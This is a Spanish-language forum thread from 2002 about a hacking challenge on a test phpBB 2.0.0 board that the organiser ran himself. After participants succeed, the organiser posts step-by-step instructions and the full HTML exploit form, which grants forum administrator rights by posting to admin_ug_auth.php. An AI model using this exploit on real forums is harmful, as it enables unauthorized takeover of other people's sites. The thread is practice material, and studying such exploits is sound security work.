Lo logre! muy bueno Tse Tse, me diverti un ratito
http://usuarios.lycos.es/hhpruebas/phpbbkerozene.gif
PD: ya estoy preparando yo un desafio para todos ustedesse viene se viene ....
05-12-2002, 05:33
Lo logre! muy bueno Tse Tse, me diverti un ratito
http://usuarios.lycos.es/hhpruebas/phpbbkerozene.gif
PD: ya estoy preparando yo un desafio para todos ustedes
Bueno, yo me he dado una vuelta por la red y la verdad es que caen basicamente todos los boards
http://usuarios.lycos.es/hhpruebas/phpbbexcalibur.jpg
Les pegué un toque, hay que ser buenos. jajaja
a mi no me quitas los privilegios marica!!
Lastima!!! He visto tarde la prueba.
Bueno, aqui teneis mi colaboracion:
http://usuarios.lycos.es/hhpruebas/phpbb01decowar.jpg
me perdi algun msg en el que dieron el pass? o como es que suben las imagenes a ese serv0 ?
kerozene eso es xq han obtenido privilegios de admin
no man! consiguieron privilegio de admin del foro, no del sitio, segun veo es porque TseTse los sube y edita los posts con la nueva ubicacion
am , es q pense q a o mejor a los admins les permitian subirt cosas al server... sALU2
06-12-2002, 10:53
Pues la prueba ya se ha acabado, ahora os voy a explicar como se hacia.
El exploit fue creado por http://www.rootsecure.net y es allí donde se encuentra en versión HTML y versión PERL. Te bajabas el exploit a tu disco duro y seguias las instrucciones (traduzco del inglés al español, se da por hecho que ya te has creado el usuario):
1. Ir al foro en el que quieres cambiarte los permisos, usando el navegador.
2. Buscar el directorio base del phpBB que en la prueba era http://usuarios.lycos.es/hhpruebas/phpbb, llegados aquí, hay que editar el código html del exploit y en la parte donde pone <form method="post" action="http://www.base_url_here.com/admin/admin_ug_auth.php">
cambiarlo por; <form method="post" action="http://usuarios.lycos.es/hhpruebas/phpbb/admin/admin_ug_auth.php">.
3. Ir a la lista de miembros.
4. Buscar tu usuario ir al perfil de tu usuario y memorizar el user id que se ve en la barra del navegador concretamente la parte de "u=?", donde '?' es un número, el id del usuario.
5. Como estamos dentro de foro (hemos hecho login) tenemos que darle a logout por fuerza, sino no funcionará y nos saldrá un mensaje que no tenemos permisos.
6. Introducir tu user id en el exploit y seleccionar el nivel que deseamos tener (en este caso Administrador), dale a submit y ya está.
Os llevará a una pantalla de login que teneis que ignorar, si quereis ir a el panel de administración, hacedlo desde el enlace que hay debajo de los foros 'Go to Administration Panel'.
A continuación os pego el código del formulario, que lo teneis que guardar en HTML para poder usarlo:
<FORM action=http://usuarios.lycos.es/hhpruebas/phpbb/admin/admin_ug_auth.php
method=post>
<P>User Level : <SELECT name=userlevel> <OPTION value=admin
selected>Administrator</OPTION> <OPTION
value=user>User</OPTION></SELECT></P><INPUT type=hidden value=0 name=private[1]>
<INPUT type=hidden value=0 name=moderator[1]> <INPUT type=hidden value=user
name=mode> <INPUT type=hidden name=adv> User ID: <INPUT size=5 name=u> <BR><INPUT class=mainoption type=submit value=Submit name=submit> <INPUT class=liteoption type=reset value=Reset name=reset> </FORM>
TseTse
06-12-2002, 11:07
Si no has borrado ningun usuario es el numeor de debajo la columna # no??? joder podias dejarlo un rato mas, me akabo de poner y no funciona la page ya...
Si, así es. Lo dejaré hasta esta noche, aún no lo he mirado pero supongo que seguirá vivo xDD vamos que yo no he tocado nada de momento.
TseTse
06-12-2002, 11:47
Pos a mi no se me abre ya, weno desde hace hora y media, si no te kuesta mucho ponla de nuevo, sino pos na ke se le va a hacer! asias por la prueba me lo toy pasando de pm
Funciona perfectamente, pero lo voy a borrar, si quereis probarlo, os podeis bajar el phpbb que he usado yo de http://prdownloads.sourceforge.net/phpbb/phpBB-2.0.0.tar.gz?use_mirror=unc os creais una cuenta en lycos y lo instalais, así podeis hacer vustras pruebas :P
TseTse
me podrias explicar un poco mejor todo esto del phpbb i k es esto del bug?
pues es un foro programado en php de código libre (si lo buscas por el google seguro q encuentras algún sitio de donde bajártelo).
El problema q presenta, es q con un simple formulario HTML (Tse Tse te indica de donde bajarlo, sino en google viene), se pueden conseguir privilegios de administrador en el foro.
saludos
osea, para poner en practica lo dicho, hay k bajarse el phpbb?
otra cosa, ya me baje el xploit del enlace k puso tsetse, i lo k hay son muchos archivos con la extension php
03-01-2003, 20:22
los archivos ".php" son el foro.
El exploit es un archivo .html
Antes, Tse-Tse tenía colgado el foro pero creo q ya lo quitó.
unos posts + atrás:
y si no lo encuentras ahí (supongo q si pero no mire) con buscarlo en el google seguro q te apareceEl exploit fue creado por http://www.rootsecure.net y es allí donde se encuentra en versión HTML y versión PERL
muchas gracias por tu ayuda lazaro!!!!!!!
pero es k no lo acabo de entender, entonces para k sirve bajarse el foro...no dijo tsetse k era desde el navegador?
debo estar torpe estos dias, pero esto no lo acabo de entender bien, agradeceria k alguien me explicara el proceso detalladamente...
A ver, la prueba terminó y borré el foro. Por lo que si quereis practicar, teneis que bajaros el phpbb 2.0.0 e instalarlo en lycos por ejemplo y luego usar el exploit. Todo eso por vuestra cuenta.
TseTse
Marcadores